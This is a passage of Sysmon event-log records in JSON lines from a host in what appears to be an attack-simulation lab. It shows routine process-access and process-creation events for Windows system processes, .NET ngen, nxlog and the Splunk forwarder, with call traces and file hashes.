Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.701\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-00104A7B0E00}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.701","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-00104A7B0E00}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-00104A7B0E00}\r\nTargetProcessId: 3220\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-00104A7B0E00}","TargetProcessId":"3220","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.794\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.794","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.935","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:58.935\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1366-5F25-0000-0010947F0E00}\r\nTargetProcessId: 4428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:58.935","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1366-5F25-0000-0010947F0E00}","TargetProcessId":"4428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.030\r\nProcessGuid: {E2A3D6B1-1367-5F25-0000-00100D830E00}\r\nProcessId: 4652\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.030","ProcessGuid":"{E2A3D6B1-1367-5F25-0000-00100D830E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.029\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00100D830E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.029","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00100D830E00}","TargetProcessId":"4652","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
